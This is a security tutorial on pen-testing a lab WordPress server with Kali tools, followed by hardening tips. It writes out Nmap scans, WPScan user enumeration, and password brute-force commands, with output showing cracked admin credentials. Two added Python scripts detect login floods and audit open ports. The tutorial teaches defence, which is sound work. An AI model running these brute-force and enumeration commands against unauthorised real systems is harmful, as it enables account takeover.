BreakingExpress

Pen testing with Linux security tools

The multitude of well-publicized breaches of large consumer corporations underscores the critical importance of system security management. Fortunately, there are many different applications that help secure computer systems. One is Kali, a Linux distribution developed for security and penetration testing. This article demonstrates how to use Kali Linux to investigate your system to find weaknesses.

Kali installs a lot of tools, all of which are open source, and having them installed by default makes things easier.

The systems that I'll use in this tutorial are:

  1. kali.usersys.redhat.com: This is the system where I'll launch the scans and attacks. It has 30GB of memory and 6 virtualized CPUs (vCPUs).
  2. vulnerable.usersys.redhat.com: This is a Red Hat Enterprise Linux 8 system that will be the target. It has 16GB of memory and 6 vCPUs. This is a relatively up-to-date system, but some packages might be out of date. This system also includes httpd-2.4.37-30.module+el8.3.0+7001+0766b9e7.x86_64, mariadb-server-10.3.27-3.module+el8.3.0+8972+5e3224e9.x86_64, tigervnc-server-1.9.0-15.el8_1.x86_64, vsftpd-3.0.3-32.el8.x86_64, and WordPress version 5.6.1.

I included the hardware specifications above because some of these tasks are pretty demanding, especially for the target system's CPU when running the WordPress Security Scanner (WPScan).

Investigate your system

I started my investigation with a basic Nmap scan on my target system. (You can dive deeper into Nmap by reading Using Nmap results to help harden Linux systems.) An Nmap scan is a quick way to get an overview of which ports and services are visible from the system initiating the Nmap scan.

This default scan shows that there are several possibly interesting open ports. In reality, any open port is possibly interesting because it could be a way for an attacker to breach your network. In this example, ports 21, 22, 80, and 443 are good to scan because they are commonly used services. At this early stage, I'm simply doing reconnaissance work and trying to get as much information about the target system as I can.

I want to investigate port 80 with Nmap, so I use the -p 80 argument to look at port 80 and -A to get information such as the operating system and application version.

Some of the key lines in this output are:

PORT   STATE SERVICE VERSION
80/tcp open  http       Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-generator: WordPress 5.6.1

Since I now know this is a WordPress server, I can use WPScan to get information about potential weaknesses. A good investigation to run is to try to find some usernames. Using --enumerate u tells WPScan to look for users in the WordPress instance. For example:

┌──(root💀kali)-[~]
└─# wpscan --url vulnerable.usersys.redhat.com --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.10
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
[+] Started: Tue Feb 16 21:38:49 2021

Interesting Finding(s):
...
[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] pgervase
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

This shows there are two users: admin and pgervase. I'll try to guess the password for admin by using a password dictionary, which is a text file with lots of possible passwords. The dictionary I used was 37G and had 3,543,076,137 lines.

Just as there are multiple text editors, web browsers, and other applications you can choose from, there are multiple tools available to launch password attacks. Here are two example commands using Nmap and WPScan:

# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=/path/to/passworddb,threads=6 vulnerable.usersys.redhat.com
# wpscan --url vulnerable.usersys.redhat.com --passwords /path/to/passworddb --usernames admin --max-threads 50 | tee nmap.txt

This Nmap script is one of many possible scripts I could have used, and scanning the URL with WPScan is just one of many possible tasks this tool can do. You can decide which you would prefer to use.

This WPScan example shows the password at the end of the file:

┌──(root💀kali)-[~]
└─# wpscan --url vulnerable.usersys.redhat.com --passwords passwords.txt --usernames admin
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.10
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
[+] Started: Thu Feb 18 20:32:13 2021

Interesting Finding(s):

…..

[+] Performing password attack on Wp Login against 1 user/s
Trying admin / redhat Time: 00:01:57 <==================================================================================================================> (3231 / 3231) 100.00% Time: 00:01:57
Trying admin / redhat Time: 00:01:57 <=========================================================                                                         > (3231 / 6462) 50.00%  ETA: ??:??:??
[SUCCESS] - admin / redhat                                                                                                                                                                      

[!] Valid Combinations Found:
 | Username: admin, Password: redhat

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Feb 18 20:34:15 2021
[+] Requests Done: 3255
[+] Cached Requests: 34
[+] Data Sent: 1.066 MB
[+] Data Received: 24.513 MB
[+] Memory used: 264.023 MB
[+] Elapsed time: 00:02:02

The Valid Combinations Found section near the end contains the admin username and password. It took only two minutes to go through 3,231 lines.

I have another dictionary file with 3,238,659,984 unique entries, which would take much longer and leave a lot more evidence.

Using Nmap produces a result much faster:

┌──(root💀kali)-[~]
└─# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=password.txt,threads=6 vulnerable.usersys.redhat.com
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 20:48 EST
Nmap scan report for vulnerable.usersys.redhat.com (10.19.47.242)
Host is up (0.00015s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 8.0 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-server-header: Apache/2.4.37 (Red Hat Enterprise Linux)
| http-wordpress-brute:
|   Accounts:
|       admin:redhat - Valid credentials              <<<<<<<
|       pgervase:redhat - Valid credentials         <<<<<<<
|_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version     port/proto  service
|   100000  2,3,4       111/tcp   rpcbind
|   100000  2,3,4       111/udp   rpcbind
|   100000  3,4         111/tcp6  rpcbind
|_  100000  3,4         111/udp6  rpcbind
3306/tcp open  mysql   MySQL 5.5.5-10.3.27-MariaDB
MAC Address: 52:54:00:8C:A1:C0 (QEMU virtual NIC)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds

However, running a scan like this can leave a flood of HTTPD logging messages on the target system:

10.19.47.170 - - [18/Feb/2021:20:14:01 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
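
The login flood in these access-log lines can be detected mechanically. The script below is an added example, not part of the original article: it parses Apache combined-format lines and flags any client that sends a burst of POST requests to /wp-login.php. The threshold, the window, the second client address (192.0.2.10) and all sample lines are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache "combined" log format, matching the access-log lines shown above.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "[^"]*" "(?P<agent>[^"]*)")?')

def find_login_floods(lines, threshold=5, window=timedelta(seconds=10)):
    """Flag IPs with >= threshold POSTs to /wp-login.php inside any window."""
    events = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not (m and m["method"] == "POST"
                and m["path"].split("?", 1)[0] == "/wp-login.php"):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events[m["ip"]].append((ts, int(m["status"]), m["agent"] or "-"))
    flagged = {}
    for ip, hits in events.items():
        hits.sort(key=lambda h: h[0])  # access logs are not strictly ordered
        recent, peak = deque(), 0
        for ts, _, _ in hits:
            recent.append(ts)
            while ts - recent[0] > window:
                recent.popleft()
            peak = max(peak, len(recent))
        if peak >= threshold:
            # WordPress returns 200 on a failed login and 302 after a successful one.
            flagged[ip] = {"peak": peak,
                "redirects": sum(1 for _, status, _ in hits if status == 302),
                "agents": {agent for _, _, agent in hits}}
    return flagged

def _line(ip, hms, status, agent):
    return (f'{ip} - - [18/Feb/2021:{hms} -0500] "POST /wp-login.php HTTP/1.1" '
            f'{status} 7575 "-" "{agent}"')

# Constructed sample input (not real traffic): one burst and one ordinary user.
WPSCAN = "WPScan v3.8.10 (https://wpscan.org/)"
SAMPLE = [_line("10.19.47.170", f"20:14:0{s}", 302 if s == 3 else 200, WPSCAN)
          for s in (1, 0, 0, 0, 2, 2, 3)]
SAMPLE += [_line("192.0.2.10", "20:10:00", 200, "Mozilla/5.0"),
           _line("192.0.2.10", "20:12:30", 302, "Mozilla/5.0")]

if __name__ == "__main__":
    print(find_login_floods(SAMPLE))
```

A flagged address with a non-zero redirects count is the case to look at first, because the burst may have ended in a working login.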

To get information about the HTTPS server found in my initial Nmap scan, I used the sslscan command:

┌──(root💀kali)-[~]
└─# sslscan vulnerable.usersys.redhat.com
Version: 2.0.6-static
OpenSSL 1.1.1i-dev  xx XXX xxxx

Connected to 10.19.47.242

Testing SSL server vulnerable.usersys.redhat.com on port 443 using SNI name vulnerable.usersys.redhat.com

  SSL/TLS Protocols:
SSLv2   disabled
SSLv3   disabled
TLSv1.0   disabled
TLSv1.1   disabled
TLSv1.2   enabled
TLSv1.3   enabled
<snip>

This shows information about the enabled SSL protocols and, further down in the output, information about the Heartbleed vulnerability:

  Heartbleed:
TLSv1.3 not vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed

Tips for preventing or mitigating attackers

There are many ways to defend your systems against the multitude of attackers out there. A few key points are:

  • Know your systems: This includes knowing which ports are open, what ports need to be open, who should be able to see those open ports, and what is the expected traffic on those services. Nmap is a great tool to learn about systems on the network.
  • Use current best practices: What is considered a best practice today might not be a best practice down the road. As an admin, it's important to stay up to date on trends in the infosec realm.
  • Know how to use your products: For example, rather than letting an attacker continually hammer away at your WordPress system, block their IP address and limit the number of times they can try to log in before getting blocked. Blocking the IP address might not be as helpful in the real world because attackers are likely to use compromised systems to launch attacks. However, it's an easy setting to enable and could block some attacks.
  • Maintain and verify good backups: If an attacker compromises one or more of your systems, being able to rebuild from known good and clean backups could save a lot of time and money.
  • Check your logs: As the examples above show, scanning and penetration commands might leave a lot of logs indicating that an attacker is targeting the system. If you notice them, you can take preemptive action to mitigate the risk.
  • Update your systems, their applications, and any extra modules: As NIST Special Publication 800-40r3 explains, “patches are usually the most effective way to mitigate software flaw vulnerabilities, and are often the only fully effective solution.”
  • Use the tools your vendors provide: Vendors have different tools to help you maintain their systems, so make sure you take advantage of them. For example, Red Hat Insights, included with Red Hat Enterprise Linux subscriptions, can help tune your systems and alert you to potential security threats.
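
For the first tip in the list above (know which ports are open and which need to be), the comparison can be scripted. The following is an added example, not part of the original article: it parses the port table from Nmap's normal output and compares the open ports with an allowlist. The sample scan text and the EXPECTED set are constructed for illustration.

```python
import re

# One row of the port table in Nmap's normal (terminal or -oN) output,
# e.g. "80/tcp open  http  Apache httpd 2.4.37 (...)".
PORT_RE = re.compile(
    r'^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+'
    r'(?P<service>\S+)\s*(?P<version>.*)$')

def parse_ports(nmap_text):
    """Return {(port, proto): (state, service, version)}; other lines are skipped."""
    found = {}
    for line in nmap_text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            found[(int(m["port"]), m["proto"])] = (
                m["state"], m["service"], m["version"].strip())
    return found

def audit(nmap_text, expected):
    """Compare open ports against an allowlist of (port, proto) pairs."""
    ports = parse_ports(nmap_text)
    open_ports = {key for key, val in ports.items() if val[0] == "open"}
    extra = open_ports - expected
    return {
        "unexpected": sorted(extra),               # open but not on the allowlist
        "missing": sorted(expected - open_ports),  # expected but not seen open
        "details": {key: ports[key] for key in extra},
    }

# Constructed sample scan text (assumption), modelled on the services in this article.
SAMPLE = """\
Nmap scan report for vulnerable.usersys.redhat.com (10.19.47.242)
PORT     STATE    SERVICE VERSION
21/tcp   open     ftp     vsftpd 3.0.3
22/tcp   open     ssh     OpenSSH 8.0 (protocol 2.0)
80/tcp   open     http    Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-generator: WordPress 5.6.1
111/tcp  open     rpcbind 2-4 (RPC #100000)
443/tcp  filtered https
3306/tcp open     mysql   MySQL 5.5.5-10.3.27-MariaDB
"""
# Hypothetical allowlist: what this web server is supposed to expose.
EXPECTED = {(22, "tcp"), (80, "tcp"), (443, "tcp")}

if __name__ == "__main__":
    report = audit(SAMPLE, EXPECTED)
    for key in report["unexpected"]:
        print("unexpected open port:", key, report["details"][key])
    for key in report["missing"]:
        print("expected but not open:", key)
```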

Learn more

This introduction to security tools and how to use them is just the tip of the iceberg. To dive deeper, you might want to look into the following resources:
